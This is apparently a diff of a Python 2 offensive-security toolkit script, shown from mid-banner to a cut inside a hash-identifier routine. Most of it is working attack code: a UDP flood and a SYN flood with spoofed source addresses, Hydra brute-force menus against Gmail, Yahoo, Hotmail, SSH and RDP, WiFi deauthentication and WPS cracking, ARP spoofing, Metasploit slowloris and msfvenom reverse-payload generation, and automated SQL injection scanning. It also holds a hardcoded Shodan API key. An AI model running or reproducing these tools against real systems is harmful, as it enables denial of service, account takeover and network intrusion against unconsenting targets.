/|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and 